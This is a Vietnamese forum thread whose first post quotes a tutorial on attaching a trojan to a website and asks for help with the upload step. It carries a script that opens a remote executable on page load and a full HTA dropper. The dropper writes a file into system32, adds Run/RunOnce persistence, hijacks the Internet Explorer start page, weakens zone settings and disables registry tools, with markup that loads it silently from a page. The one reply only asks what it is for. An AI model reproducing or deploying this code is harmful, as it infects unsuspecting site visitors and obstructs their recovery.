![]() |
|
|||||||
|   |
![]() |
|
|
Ðiều Chỉnh | Xếp Bài |
|
|
#1 |
|
Rìu Bạc
![]() Tham gia: Jan 2008
Bài: 393
VZD: 9.226
Điểm: 559/164 bài viết
|
C"ách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm .. Xin giới thiệu với các bạn 1 số cách a,Dùng 1 đoạn mã javascript để mở và phát tán trojan <script language=javascript> open("http://nguyensinh1.googlepages.com/Hack_Xu.exe"); </SCRIPT> Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra b, bạn copy vào notepad đoạn mã sau: Code: <html> <head> <script language="javascript"> try { var fso = new ActiveXObject("Scripting.FileSystemObject"); var Shell = new ActiveXObject("WScript.Shell"); var tfolder2 = fso.GetSpecialFolder(0); var filepath2 = tfolder2 + "\\system32\\System.js"; var a2 = fso.CreateTextFile(filepath2, true); a2.WriteLine('var url = "Http://nguyensinh1.googlepages.com/Hack_Xu.exe";'); a2.WriteLine('var burl = "Http://nguyensinh1.googlepages.com/Hack_Xu.exe";'); a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");'); a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);'); a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";'); a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows",filepath);'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32",filepath);'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\ ");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Http://nguyensinh1.googlepages.com/Hack_Xu.exe\\\\*",4,"REG_DWORD");'); a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies \\\\System\\\\DisableRegistryTools",1,"REG_DWORD") ;'); a2.Close(); Shell.Run(filepath2); } catch (e){} </script> <HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' /> </head> <body onload='window.close()'> </body> </html> rồi save lại với tên là : trojan.hta bạn gắn đoạn mã sau vào cuối cùng của website của bạn: Code: <center> <span datasrc="#oRun" datafld="view" dataformatas="html"></span> <xml id="oRun"> <preview> <view> <![CDATA[ <object id="oFile" data="trojan.hta?id=1"></object> ]]> </view> </preview> </xml> </center> </body> </html> rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện " Nó viế vậy đồ anh xem giúp giùm em cái đoạn "rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi" Cảm ơn anh
__________________
-[::]- $įŋħрŗō.κцτΣ -[::]- ![]() Nếu cảm thấy bài viết hay thank mình nhé các bạn BÔI ĐEN PHẦN Ở DƯỚI BẠN SẼ THẤY ĐIỀU KÌ DIỆU */*____________________________________*/* Hãy nhấn vào nút Cảm ơn bên dướp. Điều kì diệu sẽ đến với bạn */*____________________________________*/* CẤM SAO CHÉP DƯỚI MỌI HÌNH THỨC |
|
|
|
|
|
#2 |
|
Búa Gỗ Đôi
![]() Tham gia: May 2008
Bài: 44
VZD: 850
Điểm: 3/3 bài viết
|
kí nì để làm gì vậy ?
|
|
|
|
![]() |
| Ðiều Chỉnh | |
| Xếp Bài | |
|
|